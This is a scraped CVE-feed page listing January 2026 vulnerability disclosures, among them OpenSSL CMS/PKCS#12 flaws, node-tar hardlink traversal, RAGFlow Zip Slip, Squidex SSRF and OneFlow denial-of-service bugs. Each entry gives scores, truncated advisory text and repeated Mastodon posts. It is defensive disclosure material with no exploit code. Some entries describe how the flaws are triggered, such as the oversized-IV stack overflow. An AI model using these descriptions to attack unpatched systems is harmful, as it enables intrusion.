Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2026-22796
(5.3 MEDIUM)

EPSS: 0.07%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: A type confusion vulnerability exists in the signature verification of signed PKCS#7 data where an ASN1_TYPE union member is accessed without first validating the type, causing an invalid or NULL pointer dereference when processing malformed PKCS#7 data. Impact summary: An application performing signature verification of PKCS#7 data or calling directly the PKCS7_digest_from_attribu

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2025-69419
(7.4 HIGH)

EPSS: 0.03%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing non-ASCII BMP code point can trigger a one byte write before the allocated buffer. Impact summary: The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service. The OPENSSL_uni2utf8() functi

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2025-69421
(0 None)

EPSS: 0.03%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer dereference in the PKCS12_item_decrypt_d2i_ex() function. Impact summary: A NULL pointer dereference can trigger a crash which leads to Denial of Service for an application processing PKCS#12 files. The PKCS12_item_decrypt_d2i_ex() function does not check whether the oct parameter is NULL before dereferencing it. When

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2025-14988
(0 None)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

A security issue has been identified in ibaPDA that could allow unauthorized actions on the file system under certain conditions. This may impact the confidentiality, integrity, or availability of the system.

beyondmachines1@infosec.exchange at 2026-01-28T14:01:02.000Z ##

Critical File System Vulnerability Patched in iba Systems ibaPDA

iba Systems patched a critical file system vulnerability, CVE-2025-14988 in its ibaPDA software used in critical manufacturing. The flaw allows unauthorized attackers to manipulate files.

**Make sure all industrial devices are isolated from the internet and accessible from trusted networks only. Update ibaPDA to version 8.12.1 as soon as possible. In the meantime apply mitigating measures to limit impact.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-24842
(8.2 HIGH)

EPSS: 0.03%

updated 2026-01-29T16:31:35.700000

1 posts

node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.

thehackerwire@mastodon.social at 2026-01-28T13:02:32.000Z ##

🟠 CVE-2026-24842 - High (8.2)

node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to cra...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1280
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

The Frontend File Manager Plugin for WordPress is vulnerable to unauthorized file sharing due to a missing capability check on the 'wpfm_send_file_in_email' AJAX action in all versions up to, and including, 23.5. This makes it possible for unauthenticated attackers to share arbitrary uploaded files via email by supplying a file ID. Since file IDs are sequential integers, attackers can enumerate al

thehackerwire@mastodon.social at 2026-01-28T13:00:23.000Z ##

🟠 CVE-2026-1280 - High (7.5)

The Frontend File Manager Plugin for WordPress is vulnerable to unauthorized file sharing due to a missing capability check on the 'wpfm_send_file_in_email' AJAX action in all versions up to, and including, 23.5. This makes it possible for unauthe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-40536
(8.1 HIGH)

EPSS: 0.24%

updated 2026-01-29T16:31:35.700000

1 posts

SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.

thehackerwire@mastodon.social at 2026-01-28T11:00:05.000Z ##

🟠 CVE-2025-40536 - High (8.1)

SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-40537
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T16:31:35.700000

1 posts

SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials vulnerability that, under certain situations, could allow access to administrative functions.

thehackerwire@mastodon.social at 2026-01-28T10:01:29.000Z ##

🟠 CVE-2025-40537 - High (7.5)

SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials vulnerability that, under certain situations, could allow access to administrative functions.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24840
(8.0 HIGH)

EPSS: 0.02%

updated 2026-01-29T16:31:35.700000

1 posts

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a hardcoded credential in the provided installation script (located at https://dokploy.com/install.sh, line 154) uses a hardcoded password when creating the database container. This means that nearly all Dokploy installations use the same database credentials and could be compromised. Version 0.26.6 contain

thehackerwire@mastodon.social at 2026-01-28T02:01:18.000Z ##

🟠 CVE-2026-24840 - High (8)

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a hardcoded credential in the provided installation script (located at dokploy.com/install.sh, line 154) uses a hardcoded password when creating th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67645
(8.8 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. An authenticated normal user can modify the request parameters (pubpid / pid) to reference another user’s record; the server accepts the modified IDs and applies the changes to that other user’s profile. This all

thehackerwire@mastodon.social at 2026-01-28T00:52:12.000Z ##

🟠 CVE-2025-67645 - High (8.8)

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. An authenticated normal user can modify the request paramet...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-55292
(8.2 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:35.700000

1 posts

Meshtastic is an open source mesh networking solution. In the current Meshtastic architecture, a Node is identified by their NodeID, generated from the MAC address, rather than their public key. This aspect downgrades the security, specifically by abusing the HAM mode which doesn't use encryption. An attacker can, as such, forge a NodeInfo on behalf of a victim node advertising that the HAM mode i

thehackerwire@mastodon.social at 2026-01-28T00:52:01.000Z ##

🟠 CVE-2025-55292 - High (8.2)

Meshtastic is an open source mesh networking solution. In the current Meshtastic architecture, a Node is identified by their NodeID, generated from the MAC address, rather than their public key. This aspect downgrades the security, specifically by...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24836
(7.6 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, extensions could write richtext in log notes which can include scripts that would run in the PersonaBar when displayed. Versions 9.13.10 and 10.2.0 contain a fix for the issue.

thehackerwire@mastodon.social at 2026-01-28T00:51:52.000Z ##

🟠 CVE-2026-24836 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, extensions could write richtext in log notes which can include script...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24833
(7.6 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, a module could install with richtext in its description field which could contain scripts that will run for user in the Persona Bar. Versions 9.13.10 and 10.2.0 contain a fix for the issue.

thehackerwire@mastodon.social at 2026-01-28T00:47:01.000Z ##

🟠 CVE-2026-24833 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, a module could install with richtext in its description field which could contain scripts that will...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24770
(9.8 CRITICAL)

EPSS: 0.42%

updated 2026-01-29T16:31:35.700000

1 posts

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading to Remote Code Execution) via a malicious ZIP archive. The MinerUParser class retrieves and extracts ZIP files from an external source (mineru_server_ur

thehackerwire@mastodon.social at 2026-01-27T23:02:26.000Z ##

🔴 CVE-2026-24770 - Critical (9.8)

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24783
(7.5 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:35.700000

1 posts

soroban-fixed-point-math is a fixed-point math library for Soroban smart contacts. In versions 1.3.0 and 1.4.0, the `mulDiv(x, y, z)` function incorrectly handled cases where both the intermediate product $x * y$ and the divisor $z$ were negative. The logic assumed that if the intermediate product was negative, the final result must also be negative, neglecting the sign of $z$. This resulted in ro

thehackerwire@mastodon.social at 2026-01-27T23:01:01.000Z ##

🟠 CVE-2026-24783 - High (7.5)

soroban-fixed-point-math is a fixed-point math library for Soroban smart contacts. In versions 1.3.0 and 1.4.0, the `mulDiv(x, y, z)` function incorrectly handled cases where both the intermediate product $x * y$ and the divisor $z$ were negative....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24778
(8.8 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

Ghost is an open source content management system. In Ghost versions 5.43.0 through 5.12.04 and 6.0.0 through 6.14.0, an attacker was able to craft a malicious link that, when accessed by an authenticated staff user or member, would execute JavaScript with the victim's permissions, potentially leading to account takeover. Ghost Portal versions 2.29.1 through 2.51.4 and 2.52.0 through 2.57.0 were v

thehackerwire@mastodon.social at 2026-01-27T23:00:52.000Z ##

🟠 CVE-2026-24778 - High (8.8)

Ghost is an open source content management system. In Ghost versions 5.43.0 through 5.12.04 and 6.0.0 through 6.14.0, an attacker was able to craft a malicious link that, when accessed by an authenticated staff user or member, would execute JavaSc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24736
(9.1 CRITICAL)

EPSS: 0.06%

updated 2026-01-29T16:31:35.700000

2 posts

Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook configuration does not appear to validate or restrict destination IP addresses. It accepts local addresses such as 127.0.0.1 or localhost. When a rule is

thehackerwire@mastodon.social at 2026-01-27T21:53:22.000Z ##

🔴 CVE-2026-24736 - Critical (9.1)

Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:51:45.000Z ##

🔴 CVE-2026-24736 - Critical (9.1)

Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24882
(8.4 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:35.700000

1 posts

In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon during handling of the PKDECRYPT command for TPM-backed RSA and ECC keys.

thehackerwire@mastodon.social at 2026-01-27T19:30:02.000Z ##

🟠 CVE-2026-24882 - High (8.4)

In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon during handling of the PKDECRYPT command for TPM-backed RSA and ECC keys.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23593
(7.5 HIGH)

EPSS: 0.03%

updated 2026-01-29T16:31:35.700000

1 posts

A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affected directory.

thehackerwire@mastodon.social at 2026-01-27T18:37:04.000Z ##

🟠 CVE-2026-23593 - High (7.5)

A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affect...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23881
(7.7 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of service by crafting policies that exponentially amplify string data through context variables. Versions 1.16.3 and 1.15.3 contain a patch for the vulnera

thehackerwire@mastodon.social at 2026-01-27T18:02:38.000Z ##

🟠 CVE-2026-23881 - High (7.7)

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22258
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over UDP, it is believed that DCERPC over TCP and SMB are also vulnerable. DCERPC/TCP in the default configuration should not be vulnerable as the default st

thehackerwire@mastodon.social at 2026-01-27T18:00:52.000Z ##

🟠 CVE-2026-22258 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24831
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

2 posts

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

thehackerwire@mastodon.social at 2026-01-27T16:49:30.000Z ##

🟠 CVE-2026-24831 - High (7.5)

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:44:59.000Z ##

🟠 CVE-2026-24831 - High (7.5)

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24874
(9.1 CRITICAL)

EPSS: 0.03%

updated 2026-01-29T16:31:35.700000

2 posts

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.

thehackerwire@mastodon.social at 2026-01-27T16:49:21.000Z ##

🔴 CVE-2026-24874 - Critical (9.1)

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:44:49.000Z ##

🔴 CVE-2026-24874 - Critical (9.1)

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0648
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:35.700000

1 posts

The vulnerability stems from an incorrect error-checking logic in the CreateCounter() function (in threadx/utility/rtos_compatibility_layers/OSEK/tx_osek.c) when handling the return value of osek_get_counter(). Specifically, the current code checks if cntr_id equals 0u to determine failure, but @osek_get_counter() actually returns E_OS_SYS_STACK (defined as 12U) when it fails. This mismatch causes

thehackerwire@mastodon.social at 2026-01-27T16:44:53.000Z ##

🟠 CVE-2026-0648 - High (7.8)

The vulnerability stems from an incorrect error-checking logic in the CreateCounter() function (in threadx/utility/rtos_compatibility_layers/OSEK/tx_osek.c) when handling the return value of osek_get_counter(). Specifically, the current code chec...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24873
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:35.700000

1 posts

Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects lpp-vita: before lpp-vita r6.

thehackerwire@mastodon.social at 2026-01-27T16:44:44.000Z ##

🟠 CVE-2026-24873 - High (7.8)

Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects lpp-vita: before lpp-vita r6.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24872
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

improper pointer arithmetic vulnerability in ProjectSkyfire SkyFire_548.This issue affects SkyFire_548: before 5.4.8-stable5.

thehackerwire@mastodon.social at 2026-01-27T16:30:34.000Z ##

🔴 CVE-2026-24872 - Critical (9.8)

improper pointer arithmetic

vulnerability in ProjectSkyfire SkyFire_548.This issue affects SkyFire_548: before 5.4.8-stable5.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24832
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

thehackerwire@mastodon.social at 2026-01-27T16:30:23.000Z ##

🔴 CVE-2026-24832 - Critical (9.8)

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65889
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T16:31:00.867000

4 posts

A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

thehackerwire@mastodon.social at 2026-01-30T06:21:43.000Z ##

🟠 CVE-2025-65889 - High (7.5)

A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:02:16.000Z ##

🟠 CVE-2025-65889 - High (7.5)

A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-30T06:21:43.000Z ##

🟠 CVE-2025-65889 - High (7.5)

A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:02:16.000Z ##

🟠 CVE-2025-65889 - High (7.5)

A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65888
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T16:31:00.867000

4 posts

A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.

thehackerwire@mastodon.social at 2026-01-30T06:21:31.000Z ##

🟠 CVE-2025-65888 - High (7.5)

A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:02:07.000Z ##

🟠 CVE-2025-65888 - High (7.5)

A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-30T06:21:31.000Z ##

🟠 CVE-2025-65888 - High (7.5)

A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:02:07.000Z ##

🟠 CVE-2025-65888 - High (7.5)

A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65886
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T16:31:00.867000

4 posts

A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.

thehackerwire@mastodon.social at 2026-01-30T06:21:21.000Z ##

🟠 CVE-2025-65886 - High (7.5)

A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:01:58.000Z ##

🟠 CVE-2025-65886 - High (7.5)

A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-30T06:21:21.000Z ##

🟠 CVE-2025-65886 - High (7.5)

A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:01:58.000Z ##

